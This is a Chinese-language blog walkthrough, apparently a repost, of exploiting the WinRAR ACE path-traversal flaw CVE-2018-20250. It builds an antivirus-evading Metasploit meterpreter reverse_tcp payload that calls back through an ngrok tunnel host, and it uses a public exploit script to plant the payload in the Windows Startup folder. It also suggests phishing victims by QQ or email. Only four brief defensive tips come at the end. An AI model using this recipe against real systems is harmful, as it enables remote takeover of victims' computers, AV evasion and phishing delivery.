0x0 引言

Windows 操作系统下知名老牌的的压缩软件“WinRAR” 被国外安全研究团队爆出严重威胁用户的安全漏洞，被发现漏洞是“WinRAR”安装目录中的一个名为“UNACEV2.dll”的动态链接库文件，该文件自 2005 年发布至今就从未有过更新过，影响时长长达十余年之久

实验介绍
利用cve-2018-20250结合ngrok（公网安装的msf无须ngrok），穿透内网

实验环境

漏洞环境
WinRAR < 5.70 Beta 1 （5.6 测试成功）

注：推荐使用WinRAR，不然打开时有可能出现以下情况

靶机系统：win7 64位旗舰版
ip:192.168.232.138

攻击方：kali 任意版本即可
msf5
ngrok
ip:192.168.232.134

exp：https://github.com/WyAtu/CVE-2018-20250.git

0x1 复现步骤

1.测试网络

网络畅通

2 配置ngrok

打开ngrok，没有账户注册登录。开通一个免费的隧道转发代理，把ngrok隧道协议设置成TCP，内网IP改成你自己的KaliLinux的内网IP，内网端口号任意填写不冲突即可。

传送门：https://www.ngrok.cc

3. 然后下载ngrok脚本把脚本放到你的KaliLinux上面，我们选择”Linux 64Bit版本”下载即可，接着运行脚本开启代理。

往虚拟机拖放文件需要安装VMware tools ，具体安装教程可以参考我以前的帖子
传送门:https://blog.csdn.net/chest_/article/details/100009058

./sunny clientid [隧道ID]

./就是当前目录，我们找到刚刚拖进来的文件，然后输入上面命令运行即可

隧道id去隧道管理处查看即可

4.使用msf生成payload

msfconsole

use evasion/windows/windows_defender_exe(选择msf5免杀模块)

show info(显示模块信息)

set filename WinRarPayloadTest.exe(设置Payload名字 )

set payload windows/meterpreter/reverse_tcp(设置Payload类型 )

set lhost free.idcfengye.com(设置上线地址，填写Ngrok映射出去的地址即可)

set lport 12352(设置监听端口，填写Ngrok映射出去的端口即可 )

run(生成Payload)

windows_defender.exe 模块为免杀模块，测试360，安全管家不报毒

方法1：payload生成后，我们使用mv 命令把它移动到桌面来，接着把该文件移动到物理机来，我这里拖不出来，应该是VMware tools 有点问题了，推荐使用方法二

方法2：把Payload移动到apache2网站根目录下，然后开启Apache2服务器，接着我们在物理机通过浏览器访问下载，也可把u盘作为中间件连接到虚拟机，然后把payload拷到物理机上
下载前建议先把杀软关闭

5.配置payload

打开exp.py文件把“calc.exe“修改成”hui.exe”保存,修改的参数具体看自己用msf生成时的文件名是什么

用 pycharm运行exp.py文件自动在文件根目录下生成恶意压缩包

kali 开启端口监听

在我们渗透测试的过程中，最常用的就是基于tcp/udp协议反弹一个shell，也就是反向连接。

我们先来讲一下什么是正向连接和反向连接。

正向连接：我们本机去连接目标机器，比如ssh和mstsc
反向连接：目标机器去连接我们本机
那么为什么反向连接会比较常用呢

目标机器处在局域网内，我们正向连不上他
目标机器是动态ip
目标机器存在防火墙

具体反弹流程：

tcp://free.idcfengye.com:10776 -> 192.168.232.134:3456

1.受害者加载恶意程序
2.恶意程序往刚刚设置好的地址，也就是使用Ngrok 进行转发
3.我们在Kali进行端口监听，这时候如果我们接收到了对应的监听信息，这时候我们就能获取对方的shell了

接着将生成的test.rar考到靶机上面（可以通过qq，邮件等方式发送给受害者，俗称钓鱼）
C:\Users\gao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 为win7开机自启目录，通过winrar解压生成test.rar文件，在自启目录生成可执行程序
当靶机重启系统，后门文件自动执行，并反弹shell

重启靶机,同时记得开启好代理隧道,不然会导致shell反弹失败！！

接着到Kali查看

成功拿到了shell，而且还是管理员权限，由此看来，这个漏洞不可忽视！！

防御措施

1. 删除UNACEV2.dll文件

2. 不下载解压来历不明的压缩包

3. 尽快升级winrar最新版，或者卸载winrar软件

4. 安装360等安全软件，经测试，当我对压缩包进行解压缩时，360会采取相对应的防御措施

转载于：https://blog.csdn.net/chest_/article/details/103051340